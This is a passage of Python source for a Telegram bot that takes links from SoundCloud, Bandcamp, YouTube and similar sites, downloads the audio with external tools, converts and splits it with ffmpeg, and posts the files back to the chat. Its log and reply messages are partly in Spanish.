if self.SERVE_AUDIO:
self.MAX_TG_FILE_SIZE = 19_000_000
self.HELP_TEXT = get_response_text('help.tg.md')
self.SETTINGS_TEXT = get_response_text('settings.tg.md')
self.DL_TIMEOUT_TEXT = get_response_text('dl_timeout.txt').format(self.DL_TIMEOUT // 60)
self.WAIT_BIT_TEXT = [get_response_text('wait_bit.txt'), get_response_text('wait_beat.txt'),
get_response_text('wait_beet.txt')]
self.NO_AUDIO_TEXT = get_response_text('no_audio.txt')
self.NO_URLS_TEXT = get_response_text('no_urls.txt')
self.OLG_MSG_TEXT = get_response_text('old_msg.txt')
self.REGION_RESTRICTION_TEXT = get_response_text('region_restriction.txt')
self.DIRECT_RESTRICTION_TEXT = get_response_text('direct_restriction.txt')
self.LIVE_RESTRICTION_TEXT = get_response_text('live_restriction.txt')
# self.chat_storage = {}
self.chat_storage = shelve.open(chat_storage_file, writeback=True)
for chat_id in (no_flood_chat_ids or []):
self.init_chat(chat_id=chat_id, chat_type=Chat.PRIVATE if chat_id > 0 else Chat.SUPERGROUP, flood="no")
self.ALERT_CHAT_IDS = set(alert_chat_ids) if alert_chat_ids else set()
self.STORE_CHAT_ID = store_chat_id
self.DL_DIR = dl_dir
self.COOKIES_DOWNLOAD_FILE = "/tmp/scdlbot_cookies.txt"
self.proxies = proxies
self.source_ips = source_ips
# https://yandex.com/support/music-app-ios/search-and-listen/listening-abroad.html
self.cookies_file = cookies_file
# if sc_auth_token:
# config = configparser.ConfigParser()
# config['scdl'] = {}
# config['scdl']['path'] = self.DL_DIR
# config['scdl']['auth_token'] = sc_auth_token
# config_dir = os.path.join(os.path.expanduser('~'), '.config', 'scdl')
# config_path = os.path.join(config_dir, 'scdl.cfg')
# os.makedirs(config_dir, exist_ok=True)
# with open(config_path, 'w') as config_file:
# config.write(config_file)
self.updater = Updater(token=tg_bot_token, base_url=f"{self.TG_BOT_API}/bot", use_context=True, base_file_url=f"{self.TG_BOT_API}/file/bot")
dispatcher = self.updater.dispatcher
start_command_handler = CommandHandler('start', self.help_command_callback)
dispatcher.add_handler(start_command_handler)
help_command_handler = CommandHandler('help', self.help_command_callback)
dispatcher.add_handler(help_command_handler)
settings_command_handler = CommandHandler('settings', self.settings_command_callback)
dispatcher.add_handler(settings_command_handler)
dl_command_handler = CommandHandler('dl', self.common_command_callback,
filters=~Filters.update.edited_message & ~Filters.forwarded)
dispatcher.add_handler(dl_command_handler)
link_command_handler = CommandHandler('link', self.common_command_callback,
filters=~Filters.update.edited_message & ~Filters.forwarded)
dispatcher.add_handler(link_command_handler)
message_with_links_handler = MessageHandler(~Filters.update.edited_message & ~Filters.command &
((Filters.text & (Filters.entity(MessageEntity.URL) |
Filters.entity(MessageEntity.TEXT_LINK))) |
(Filters.caption & (Filters.caption_entity(MessageEntity.URL) |
Filters.caption_entity(
MessageEntity.TEXT_LINK)))),
self.common_command_callback)
dispatcher.add_handler(message_with_links_handler)
button_query_handler = CallbackQueryHandler(self.button_query_callback)
dispatcher.add_handler(button_query_handler)
inline_query_handler = InlineQueryHandler(self.inline_query_callback)
dispatcher.add_handler(inline_query_handler)
unknown_handler = MessageHandler(Filters.command, self.unknown_command_callback)
dispatcher.add_handler(unknown_handler)
dispatcher.add_error_handler(self.error_callback)
self.bot_username = self.updater.bot.get_me().username
self.RANT_TEXT_PRIVATE = "Read /help to learn how to use me"
self.RANT_TEXT_PUBLIC = "[Start me in PM to read help and learn how to use me](t.me/{}?start=1)".format(
self.bot_username)
def start(self, use_webhook=False, webhook_host="127.0.0.1", webhook_port=None, cert_file=None, cert_key_file=None,
url_path="scdlbot"):
if use_webhook:
self.updater.start_webhook(listen=webhook_host,
port=webhook_port,
url_path=url_path)
# cert=cert_file if cert_file else None,
# key=cert_key_file if cert_key_file else None,
# webhook_url=urljoin(app_url, url_path))
self.updater.bot.set_webhook(url=urljoin(self.APP_URL, url_path),
certificate=open(cert_file, 'rb') if cert_file else None)
else:
self.updater.start_polling()
logger.warning("Bot started")
self.updater.idle()
def unknown_command_callback(self, update: Update, context: CallbackContext):
pass
# bot.send_message(chat_id=update.message.chat_id, text="Unknown command")
def error_callback(self, update: Update, context: CallbackContext): # skipcq: PYL-R0201
try:
raise context.error
except Unauthorized:
# remove update.message.chat_id from conversation list
logger.debug('Update {} caused Unauthorized error: {}'.format(update, context.error))
except BadRequest:
# handle malformed requests - read more below!
logger.debug('Update {} caused BadRequest error: {}'.format(update, context.error))
except TimedOut:
# handle slow connection problems
logger.debug('Update {} caused TimedOut error: {}'.format(update, context.error))
except NetworkError:
# handle other connection problems
logger.debug('Update {} caused NetworkError: {}'.format(update, context.error))
except ChatMigrated as e:
# the chat_id of a group has changed, use e.new_chat_id instead
logger.debug('Update {} caused ChatMigrated error: {}'.format(update, context.error))
except TelegramError:
# handle all other telegram related errors
logger.debug('Update {} caused TelegramError: {}'.format(update, context.error))
def init_chat(self, message=None, chat_id=None, chat_type=None, flood="yes"):
if message:
chat_id = str(message.chat_id)
chat_type = message.chat.type
else:
chat_id = str(chat_id)
if chat_id not in self.chat_storage:
self.chat_storage[chat_id] = {}
if "settings" not in self.chat_storage[chat_id]:
self.chat_storage[chat_id]["settings"] = {}
if "mode" not in self.chat_storage[chat_id]["settings"]:
if chat_type == Chat.PRIVATE:
self.chat_storage[chat_id]["settings"]["mode"] = "dl"
else:
self.chat_storage[chat_id]["settings"]["mode"] = "ask"
if "flood" not in self.chat_storage[chat_id]["settings"]:
self.chat_storage[chat_id]["settings"]["flood"] = flood
if "rant_msg_ids" not in self.chat_storage[chat_id]["settings"]:
self.chat_storage[chat_id]["settings"]["rant_msg_ids"] = []
self.chat_storage.sync()
# logger.debug("Current chat_storage: %r", self.chat_storage)
def cleanup_chat(self, chat_id):
chat_msgs = self.chat_storage[str(chat_id)].copy()
for msg_id in chat_msgs:
if msg_id != "settings":
timedelta = datetime.now() - self.chat_storage[str(chat_id)][msg_id]["message"].date
if timedelta.days > 0:
self.chat_storage[str(chat_id)].pop(msg_id)
self.chat_storage.sync()
def rant_and_cleanup(self, bot, chat_id, rant_text, reply_to_message_id=None):
rant_msg = bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text=rant_text, parse_mode='Markdown', disable_web_page_preview=True)
flood = self.chat_storage[str(chat_id)]["settings"]["flood"]
if flood == "no":
rant_msgs = self.chat_storage[str(chat_id)]["settings"]["rant_msg_ids"].copy()
for rant_msg_id in rant_msgs:
try:
bot.delete_message(chat_id=chat_id, message_id=rant_msg_id)
except:
pass
self.chat_storage[str(chat_id)]["settings"]["rant_msg_ids"].remove(rant_msg_id)
self.chat_storage[str(chat_id)]["settings"]["rant_msg_ids"].append(rant_msg.message_id)
self.chat_storage.sync()
def help_command_callback(self, update: Update, context: CallbackContext):
self.init_chat(update.message)
event_name = "help"
entities = update.message.parse_entities(types=[MessageEntity.BOT_COMMAND])
for entity_value in entities.values():
event_name = entity_value.replace("/", "").replace("@{}".format(self.bot_username), "")
break
log_and_track(event_name, update.message)
chat_id = update.message.chat_id
chat_type = update.message.chat.type
reply_to_message_id = update.message.message_id
flood = self.chat_storage[str(chat_id)]["settings"]["flood"]
if chat_type != Chat.PRIVATE and flood == "no":
self.rant_and_cleanup(context.bot, chat_id, self.RANT_TEXT_PUBLIC, reply_to_message_id=reply_to_message_id)
else:
context.bot.send_message(chat_id=chat_id, text=self.HELP_TEXT,
parse_mode='Markdown', disable_web_page_preview=True)
def get_wait_text(self):
return random.choice(self.WAIT_BIT_TEXT)
def get_settings_inline_keyboard(self, chat_id):
mode = self.chat_storage[str(chat_id)]["settings"]["mode"]
flood = self.chat_storage[str(chat_id)]["settings"]["flood"]
emoji_yes = "✅"
emoji_no = "❌"
button_dl = InlineKeyboardButton(text=" ".join([emoji_yes if mode == "dl" else emoji_no, "Download"]),
callback_data=" ".join(["settings", "dl"]))
button_link = InlineKeyboardButton(text=" ".join([emoji_yes if mode == "link" else emoji_no, "Links"]),
callback_data=" ".join(["settings", "link"]))
button_ask = InlineKeyboardButton(text=" ".join([emoji_yes if mode == "ask" else emoji_no, "Ask"]),
callback_data=" ".join(["settings", "ask"]))
button_flood = InlineKeyboardButton(text=" ".join([emoji_yes if flood == "yes" else emoji_no, "Captions"]),
callback_data=" ".join(["settings", "flood"]))
button_close = InlineKeyboardButton(text=" ".join([emoji_no, "Close settings"]),
callback_data=" ".join(["settings", "close"]))
inline_keyboard = InlineKeyboardMarkup([[button_dl, button_link, button_ask], [button_flood, button_close]])
return inline_keyboard
def settings_command_callback(self, update: Update, context: CallbackContext):
self.init_chat(update.message)
log_and_track("settings")
chat_id = update.message.chat_id
context.bot.send_message(chat_id=chat_id, parse_mode='Markdown',
reply_markup=self.get_settings_inline_keyboard(chat_id),
text=self.SETTINGS_TEXT)
def common_command_callback(self, update: Update, context: CallbackContext):
self.init_chat(update.message)
chat_id = update.message.chat_id
chat_type = update.message.chat.type
reply_to_message_id = update.message.message_id
command_entities = update.message.parse_entities(types=[MessageEntity.BOT_COMMAND])
if not command_entities:
command_passed = False
# if no command then it is just a message and use default mode
mode = self.chat_storage[str(chat_id)]["settings"]["mode"]
else:
command_passed = True
# try to determine mode from command
mode = None
for entity_value in command_entities.values():
mode = entity_value.replace("/", "").replace("@{}".format(self.bot_username), "")
break
if not mode:
mode = "dl"
if command_passed and not context.args:
rant_text = self.RANT_TEXT_PRIVATE if chat_type == Chat.PRIVATE else self.RANT_TEXT_PUBLIC
rant_text += "\nYou can simply send message with links (to download) OR command as `/{} <links>`.".format(
mode)
self.rant_and_cleanup(context.bot, chat_id, rant_text, reply_to_message_id=reply_to_message_id)
return
# apologize and send TYPING: always in PM and only when it's command in non-PM
apologize = chat_type == Chat.PRIVATE or command_passed
if apologize:
context.bot.send_chat_action(chat_id=chat_id, action=ChatAction.TYPING)
source_ip = None
proxy = None
if self.source_ips:
source_ip = random.choice(self.source_ips)
if self.proxies:
proxy = random.choice(self.proxies)
# TODO find working IP?
urls = self.prepare_urls(msg_or_text=update.message,
direct_urls=(mode == "link"),
source_ip=source_ip, proxy=proxy)
logger.debug(urls)
if not urls:
if apologize:
context.bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text=self.NO_URLS_TEXT, parse_mode='Markdown')
else:
event_name = ("{}_cmd".format(mode)) if command_passed else ("{}_msg".format(mode))
log_and_track(event_name, update.message)
if mode == "dl":
wait_message = context.bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
parse_mode='Markdown', text=get_italic(self.get_wait_text()))
for url in urls:
self.download_url_and_send(context.bot, url, urls[url], chat_id=chat_id,
reply_to_message_id=reply_to_message_id,
wait_message_id=wait_message.message_id,
source_ip=source_ip, proxy=proxy)
elif mode == "link":
wait_message = context.bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
parse_mode='Markdown', text=get_italic(self.get_wait_text()))
link_text = get_link_text(urls)
context.bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
parse_mode='Markdown', disable_web_page_preview=True,
text=link_text if link_text else self.NO_URLS_TEXT)
context.bot.delete_message(chat_id=chat_id, message_id=wait_message.message_id)
elif mode == "ask":
# ask: always in PM and only if good urls exist in non-PM
if chat_type == Chat.PRIVATE or "http" in " ".join(urls.values()):
orig_msg_id = str(reply_to_message_id)
self.chat_storage[str(chat_id)][orig_msg_id] = {"message": update.message, "urls": urls,
"source_ip": source_ip, "proxy": proxy}
question = "🎶 links found, what to do?"
button_dl = InlineKeyboardButton(text="✅ Download", callback_data=" ".join([orig_msg_id, "dl"]))
button_link = InlineKeyboardButton(text="❇️ Links",
callback_data=" ".join([orig_msg_id, "link"]))
button_cancel = InlineKeyboardButton(text="❎", callback_data=" ".join([orig_msg_id, "nodl"]))
inline_keyboard = InlineKeyboardMarkup([[button_dl, button_link, button_cancel]])
context.bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
reply_markup=inline_keyboard, text=question)
self.cleanup_chat(chat_id)
def button_query_callback(self, update: Update, context: CallbackContext):
btn_msg = update.callback_query.message
self.init_chat(btn_msg)
user_id = update.callback_query.from_user.id
btn_msg_id = btn_msg.message_id
chat = btn_msg.chat
chat_id = chat.id
chat_type = chat.type
orig_msg_id, action = update.callback_query.data.split()
if orig_msg_id == "settings":
if chat_type != Chat.PRIVATE:
chat_member_status = chat.get_member(user_id).status
if chat_member_status not in [ChatMember.ADMINISTRATOR,
ChatMember.CREATOR] and user_id not in self.ALERT_CHAT_IDS:
log_and_track("settings_fail")
update.callback_query.answer(text="You're not chat admin")
return
log_and_track("settings_{}".format(action), btn_msg)
if action == "close":
context.bot.delete_message(chat_id, btn_msg_id)
else:
setting_changed = False
if action in ["dl", "link", "ask"]:
current_setting = self.chat_storage[str(chat_id)]["settings"]["mode"]
if action != current_setting:
setting_changed = True
self.chat_storage[str(chat_id)]["settings"]["mode"] = action
elif action in ["flood"]:
current_setting = self.chat_storage[str(chat_id)]["settings"]["flood"]
setting_changed = True
self.chat_storage[str(chat_id)]["settings"][action] = "no" if current_setting == "yes" else "yes"
if setting_changed:
self.chat_storage.sync()
update.callback_query.answer(text="Settings changed")
update.callback_query.edit_message_reply_markup(parse_mode='Markdown',
reply_markup=self.get_settings_inline_keyboard(
chat_id))
else:
update.callback_query.answer(text="Settings not changed")
elif orig_msg_id in self.chat_storage[str(chat_id)]:
msg_from_storage = self.chat_storage[str(chat_id)].pop(orig_msg_id)
orig_msg = msg_from_storage["message"]
urls = msg_from_storage["urls"]
source_ip = msg_from_storage["source_ip"]
proxy = msg_from_storage["proxy"]
log_and_track("{}_msg".format(action), orig_msg)
if action == "dl":
update.callback_query.answer(text=self.get_wait_text())
wait_message = update.callback_query.edit_message_text(parse_mode='Markdown',
text=get_italic(self.get_wait_text()))
for url in urls:
self.download_url_and_send(context.bot, url, urls[url], chat_id=chat_id,
reply_to_message_id=orig_msg_id,
wait_message_id=wait_message.message_id,
source_ip=source_ip, proxy=proxy)
elif action == "link":
update.callback_query.answer(text=self.get_wait_text())
wait_message = update.callback_query.edit_message_text(parse_mode='Markdown',
text=get_italic(self.get_wait_text()))
urls = self.prepare_urls(urls.keys(), direct_urls=True, source_ip=source_ip, proxy=proxy)
link_text = get_link_text(urls)
context.bot.send_message(chat_id=chat_id, reply_to_message_id=orig_msg_id,
parse_mode='Markdown', disable_web_page_preview=True,
text=link_text if link_text else self.NO_URLS_TEXT)
context.bot.delete_message(chat_id=chat_id, message_id=wait_message.message_id)
elif action == "nodl":
context.bot.delete_message(chat_id=chat_id, message_id=btn_msg_id)
else:
update.callback_query.answer(text=self.OLG_MSG_TEXT)
context.bot.delete_message(chat_id=chat_id, message_id=btn_msg_id)
def inline_query_callback(self, update: Update, context: CallbackContext):
log_and_track("link_inline")
inline_query_id = update.inline_query.id
text = update.inline_query.query
results = []
urls = self.prepare_urls(msg_or_text=text, direct_urls=True)
for url in urls:
for direct_url in urls[url].splitlines(): # TODO: fix non-mp3 and allow only sc/bc
logger.debug(direct_url)
results.append(
InlineQueryResultAudio(id=str(uuid4()), audio_url=direct_url, title="FAST_INLINE_DOWNLOAD"))
try:
context.bot.answer_inline_query(inline_query_id, results)
except:
pass
def prepare_urls(self, msg_or_text, direct_urls=False, source_ip=None, proxy=None):
if isinstance(msg_or_text, Message):
urls = []
url_entities = msg_or_text.parse_entities(types=[MessageEntity.URL])
url_caption_entities = msg_or_text.parse_caption_entities(types=[MessageEntity.URL])
url_entities.update(url_caption_entities)
for entity in url_entities:
url_str = url_entities[entity]
logger.debug("Entity URL Parsed: %s", url_str)
if "://" not in url_str:
url_str = "http://{}".format(url_str)
urls.append(URL(url_str))
text_link_entities = msg_or_text.parse_entities(types=[MessageEntity.TEXT_LINK])
text_link_caption_entities = msg_or_text.parse_caption_entities(types=[MessageEntity.TEXT_LINK])
text_link_entities.update(text_link_caption_entities)
for entity in text_link_entities:
url_str = entity.url
logger.debug("Entity Text Link Parsed: %s", url_str)
urls.append(URL(url_str))
else:
urls = find_all_links(msg_or_text, default_scheme="http")
urls_dict = {}
for url_item in urls:
url = url_item
# unshorten soundcloud.app.goo.gl and other links, but not tiktok:
if "tiktok" not in url_item.host:
try:
url = URL(requests.head(url_item, allow_redirects=True).url)
except:
pass
url_text = url.to_text(True)
#FIXME crutch:
url_text = url_text.replace("m.soundcloud.com", "soundcloud.com")
url_parts_num = len([part for part in url.path_parts if part])
try:
if (
# SoundCloud: tracks, sets and widget pages, no /you/ pages #TODO private sets are 5
(self.SITES["sc"] in url.host and (2 <= url_parts_num <= 4 or self.SITES["scapi"] in url_text) and (
not "you" in url.path_parts)) or
# Bandcamp: tracks and albums
(self.SITES["bc"] in url.host and (2 <= url_parts_num <= 2)) or
# YouTube: videos and playlists
(self.SITES["yt"] in url.host and (
"youtu.be" in url.host or "watch" in url.path or "playlist" in url.path))
):
if direct_urls or self.SITES["yt"] in url.host:
urls_dict[url_text] = get_direct_urls(url_text, self.cookies_file, self.COOKIES_DOWNLOAD_FILE,
source_ip, proxy)
else:
urls_dict[url_text] = "http"
elif not any((site in url.host for site in self.SITES.values())):
urls_dict[url_text] = get_direct_urls(url_text, self.cookies_file, self.COOKIES_DOWNLOAD_FILE,
source_ip, proxy)
except ProcessExecutionError:
logger.debug("youtube-dl get-url failed: %s", url_text)
except URLError as exc:
urls_dict[url_text] = exc.status
return urls_dict
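# Added note on the return shape: prepare_urls() maps each recognised URL string to either a
# newline-separated list of direct media URLs, the placeholder "http" (downloadable, resolve
# later), or an error status string propagated from URLError.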
@REQUEST_TIME.time()
@run_async
def download_url_and_send(self, bot, url, direct_urls, chat_id, reply_to_message_id=None,
wait_message_id=None, source_ip=None, proxy=None):
bot.send_chat_action(chat_id=chat_id, action=ChatAction.RECORD_AUDIO)
download_dir = os.path.join(self.DL_DIR, str(uuid4()))
shutil.rmtree(download_dir, ignore_errors=True)
os.makedirs(download_dir)
status = 0
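# Added note on status codes: 1 = success, 0 = not yet attempted, -1 = download timeout,
# -2 = download failure, -3 = direct-link restriction, -4 = region restriction,
# -5 = live-stream restriction, -6 = direct-URL resolution timeout; the negative values are
# mapped to the corresponding *_TEXT replies further below.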
if direct_urls == "direct":
status = -3
elif direct_urls == "country":
status = -4
elif direct_urls == "live":
status = -5
elif direct_urls == "timeout":
status = -6
else:
if (self.SITES["sc"] in url and self.SITES["scapi"] not in url) or (self.SITES["bc"] in url):
cmd_name = "scdl"
cmd_args = []
cmd = None
cmd_input = None
if self.SITES["sc"] in url and self.SITES["scapi"] not in url:
cmd = scdl_bin
cmd_name = str(cmd)
cmd_args = (
"-l", url, # URL of track/playlist/user
"-c", # Continue if a music already exist
"--path", download_dir, # Download the music to a custom path
"--onlymp3", # Download only the mp3 file even if the track is Downloadable
"--addtofile", # Add the artist name to the filename if it isn't in the filename already
"--addtimestamp",
# Adds the timestamp of the creation of the track to the title (useful to sort chronologically)
"--no-playlist-folder",
# Download playlist tracks into directory, instead of making a playlist subfolder
"--extract-artist", # Set artist tag from title instead of username
)
cmd_input = None
elif self.SITES["bc"] in url:
cmd = bandcamp_dl_bin
cmd_name = str(cmd)
cmd_args = (
"--base-dir", download_dir, # Base location of which all files are downloaded
"--template", "%{track} - %{artist} - %{title} [%{album}]", # Output filename template
"--overwrite", # Overwrite tracks that already exist
"--group", # Use album/track Label as iTunes grouping
"--embed-art", # Embed album art (if available)
"--no-slugify", # Disable slugification of track, album, and artist names
url, # URL of album/track
)
cmd_input = "yes"
logger.info("%s starts: %s", cmd_name, url)
cmd_proc = cmd[cmd_args].popen(stdin=PIPE, stdout=PIPE, stderr=PIPE, universal_newlines=True)
try:
cmd_stdout, cmd_stderr = cmd_proc.communicate(input=cmd_input, timeout=self.DL_TIMEOUT)
cmd_retcode = cmd_proc.returncode
# TODO listed are common scdl problems for one track with 0 retcode, all its output is always in stderr:
if cmd_retcode or (any(err in cmd_stderr for err in ["Error resolving url", "is not streamable",
"Failed to get item"]) and ".mp3" not in cmd_stderr):
raise ProcessExecutionError(cmd_args, cmd_retcode, cmd_stdout, cmd_stderr)
logger.info("%s succeeded: %s", cmd_name, url)
status = 1
except TimeoutExpired:
cmd_proc.kill()
logger.info("%s took too much time and dropped: %s", cmd_name, url)
status = -1
except ProcessExecutionError:
logger.exception("%s failed: %s", cmd_name, url)
if status == 0:
cmd = youtube_dl_func
cmd_name = "youtube_dl_func"
# TODO: set different ydl_opts for different sites
ydl_opts = {
'format': 'bestaudio/best',
'outtmpl': os.path.join(download_dir, '%(title)s.%(ext)s'),
# default: %(autonumber)s - %(title)s-%(id)s.%(ext)s
'postprocessors': [
{
'key': 'FFmpegExtractAudio',
'preferredcodec': 'mp3',
'preferredquality': '128',
},
# {'key': 'EmbedThumbnail',}, {'key': 'FFmpegMetadata',},
],
}
host = urlparse(url).hostname
if host == "tiktok.com" or host.endswith(".tiktok.com"):
ydl_opts['postprocessors'] = []
ydl_opts['outtmpl'] = os.path.join(download_dir, 'tiktok.%(ext)s')
if proxy:
ydl_opts['proxy'] = proxy
if source_ip:
ydl_opts['source_address'] = source_ip
# https://github.com/ytdl-org/youtube-dl/blob/master/youtube_dl/YoutubeDL.py#L210
if self.cookies_file:
if "http" in self.cookies_file:
ydl_opts['cookiefile'] = self.COOKIES_DOWNLOAD_FILE
else:
ydl_opts['cookiefile'] = self.cookies_file
queue = Queue()
cmd_args = (url, ydl_opts, queue,)
logger.info("%s inicia: %s", cmd_name, url)
cmd_proc = Process(target=cmd, args=cmd_args)
cmd_proc.start()
try:
cmd_retcode, cmd_stderr = queue.get(block=True, timeout=self.DL_TIMEOUT)
cmd_stdout = ""
cmd_proc.join()
if cmd_retcode:
raise ProcessExecutionError(cmd_args, cmd_retcode, cmd_stdout, cmd_stderr)
# raise cmd_status #TODO: pass and re-raise original Exception?
logger.info("%s éxito: %s", cmd_name, url)
status = 1
except Empty:
cmd_proc.join(1)
if cmd_proc.is_alive():
cmd_proc.terminate()
logger.info("%s se tomó demasiado tiempo y se dejó caer: %s", cmd_name, url)
status = -1
except ProcessExecutionError:
logger.exception("%s falló: %s", cmd_name, url)
status = -2
gc.collect()
if status in [-1, -6]:
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text=self.DL_TIMEOUT_TEXT, parse_mode='Markdown')
elif status == -2:
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text=self.NO_AUDIO_TEXT, parse_mode='Markdown')
elif status == -3:
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text=self.DIRECT_RESTRICTION_TEXT, parse_mode='Markdown')
elif status == -4:
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text=self.REGION_RESTRICTION_TEXT, parse_mode='Markdown')
elif status == -5:
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text=self.LIVE_RESTRICTION_TEXT, parse_mode='Markdown')
elif status == 1:
file_list = []
for d, dirs, files in os.walk(download_dir):
for file in files:
file_list.append(os.path.join(d, file))
if not file_list:
logger.info("No files in dir: %s", download_dir)
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text="*Lo siento, no he podido descargar ningún archivo de los enlaces proporcionados.",
parse_mode='Markdown')
else:
for file in sorted(file_list):
file_name = os.path.split(file)[-1]
file_parts = []
try:
file_parts = self.convert_and_split_audio_file(file)
except FileNotSupportedError as exc:
if not (exc.file_format in ["m3u", "jpg", "jpeg", "png", "finished", "tmp"]):
logger.warning("Formato de archivo no compatible: %s", file_name)
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text="*Lo siento*, el archivo descargado `{}` está en un formato que aún no he podido convertir o enviar".format(
file_name),
parse_mode='Markdown')
except FileTooLargeError as exc:
logger.info("Archivo grande para convertir: %s", file_name)
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text="*Lo siento, el archivo descargado tiene un tamaño de `{}` MB y es más grande de lo que puedo convertir (`{} MB`)".format(
file_name, exc.file_size // 1000000,
self.MAX_CONVERT_FILE_SIZE // 1000000),
parse_mode='Markdown')
except FileSplittedPartiallyError as exc:
file_parts = exc.file_parts
logger.exception("Falló la división: %s", file_name)
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text="*Lo siento*, no hay suficiente memoria para convertir el archivo `{}`..".format(
file_name),
parse_mode='Markdown')
except FileNotConvertedError as exc:
logger.exception("Falló la división: %s", file_name)
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text="*Lo siento*, no hay suficiente memoria para convertir el archivo `{}`..".format(
file_name),
parse_mode='Markdown')
try:
caption = None
flood = self.chat_storage[str(chat_id)]["settings"]["flood"]
if flood == "yes":
addition = ""
url_obj = URL(url)
if self.SITES["yt"] in url_obj.host:
source = "YouTube"
file_root, file_ext = os.path.splitext(file_name)
file_title = file_root.replace(file_ext, "")
addition = ": " + file_title
elif self.SITES["sc"] in url_obj.host:
source = "SoundCloud"
elif self.SITES["bc"] in url_obj.host:
source = "Bandcamp"
else:
source = url_obj.host.replace(".com", "").replace("www.", "").replace("m.", "")
# if "youtu.be" in url_obj.host:
# url = url.replace("http://", "").replace("https://", "")
# else:
# url = shorten_url(url)
caption = "@{} _lo obtuve de_ [{}]({}){}".format(self.bot_username.replace("_", "\_"),
source, url, addition.replace("_", "\_"))
# logger.info(caption)
sent_audio_ids = self.send_audio_file_parts(bot, chat_id, file_parts,
reply_to_message_id if flood == "yes" else None,
caption)
except FileSentPartiallyError as exc:
sent_audio_ids = exc.sent_audio_ids
bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id,
text="*Lo siento, no se ha podido enviar el archivo `{}` o algunas de sus partes..".format(
file_name),
parse_mode='Markdown')
logger.warning("El envío de algunas piezas ha fallado: %s", file_name)
if not self.SERVE_AUDIO:
shutil.rmtree(download_dir, ignore_errors=True)
if wait_message_id: # TODO: delete only once
try:
bot.delete_message(chat_id=chat_id, message_id=wait_message_id)
except:
pass
def convert_and_split_audio_file(self, file=""):
file_root, file_ext = os.path.splitext(file)
file_format = file_ext.replace(".", "").lower()
file_size = os.path.getsize(file)
# FIXME unknown_video is for tiktok
if file_format not in ["mp3", "m4a", "mp4", "unknown_video"]:
raise FileNotSupportedError(file_format)
if file_size > self.MAX_CONVERT_FILE_SIZE:
raise FileTooLargeError(file_size)
# FIXME unknown_video is for tiktok and also tiktok.mp4
if file_format not in ["mp3", "unknown_video"] and "tiktok." not in file:
logger.info("Convirtiendo: %s", file)
try:
file_converted = file.replace(file_ext, ".mp3")
ffinput = ffmpeg.input(file)
ffmpeg.output(ffinput, file_converted, audio_bitrate="128k", vn=None).run()
file = file_converted
file_root, file_ext = os.path.splitext(file)
file_format = file_ext.replace(".", "").lower()
file_size = os.path.getsize(file)
except Exception:
# TODO exceptions
raise FileNotConvertedError
file_parts = []
if file_size <= self.MAX_TG_FILE_SIZE:
file_parts.append(file)
else:
logger.info("Dividiendo: %s", file)
id3 = None
try:
id3 = ID3(file, translate=False)
except:
pass
parts_number = file_size // self.MAX_TG_FILE_SIZE + 1
# https://github.com/c0decracker/video-splitter
# https://superuser.com/a/1354956/464797
try:
# file_duration = float(ffmpeg.probe(file)['format']['duration'])
part_size = file_size // parts_number
cur_position = 0
for i in range(parts_number):
file_part = file.replace(file_ext, ".part{}{}".format(str(i + 1), file_ext))
ffinput = ffmpeg.input(file)
if i == (parts_number - 1):
ffmpeg.output(ffinput, file_part, codec="copy", vn=None, ss=cur_position).run()
else:
ffmpeg.output(ffinput, file_part, codec="copy", vn=None, ss=cur_position, fs=part_size).run()
part_duration = float(ffmpeg.probe(file_part)['format']['duration'])
cur_position += part_duration
if id3:
try:
id3.save(file_part, v1=2, v2_version=4)
except:
pass
file_parts.append(file_part)
except Exception:
# TODO exceptions
raise FileSplittedPartiallyError(file_parts)
return file_parts
def send_audio_file_parts(self, bot, chat_id, file_parts, reply_to_message_id=None, caption=None):
sent_audio_ids = []
for index, file_part in enumerate(file_parts):
path = pathlib.Path(file_part)
file_name = os.path.split(file_part)[-1]
# file_name = translit(file_name, 'ru', reversed=True)
logger.info("Enviando: %s", file_name)
bot.send_chat_action(chat_id=chat_id, action=ChatAction.UPLOAD_AUDIO)
caption_part = None
if len(file_parts) > 1:
caption_part = "Part {} of {}".format(str(index + 1), str(len(file_parts)))
if caption:
if caption_part:
caption_full = caption_part + " | " + caption
else:
caption_full = caption
else:
if caption_part:
caption_full = caption_part
else:
caption_full = ""
# caption_full = textwrap.shorten(caption_full, width=190, placeholder="..")
for i in range(3):
try:
if file_part.endswith('.mp3'):
mp3 = MP3(file_part)
duration = round(mp3.info.length)
performer = None
title = None
try:
performer = ", ".join(mp3['artist'])
title = ", ".join(mp3['title'])
except:
pass
if "127.0.0.1" in self.TG_BOT_API:
audio = path.absolute().as_uri()
logger.debug(audio)
elif self.SERVE_AUDIO:
audio = str(urljoin(self.APP_URL, str(path.relative_to(self.DL_DIR))))
logger.debug(audio)
else:
audio = open(file_part, 'rb')
if i > 0:
# maybe: Reply message not found
reply_to_message_id = None
audio_msg = bot.send_audio(chat_id=chat_id,
reply_to_message_id=reply_to_message_id,
audio=audio,
duration=duration,
performer=performer,
title=title,
caption=caption_full,
parse_mode='Markdown')
sent_audio_ids.append(audio_msg.audio.file_id)
logger.info("El envío ha sido exitoso: %s", file_name)
break
# FIXME unknown_video is for tiktok
elif file_part.endswith('.unknown_video') or "tiktok." in file_part:
video = open(file_part, 'rb')
video_msg = bot.send_video(chat_id=chat_id,
reply_to_message_id=reply_to_message_id,
video=video,
# duration=duration,
caption=caption_full,
parse_mode='Markdown')
sent_audio_ids.append(video_msg.video.file_id)
logger.info("El envío ha sido exitoso: %s", file_name)
break
except TelegramError:
if i == 2:
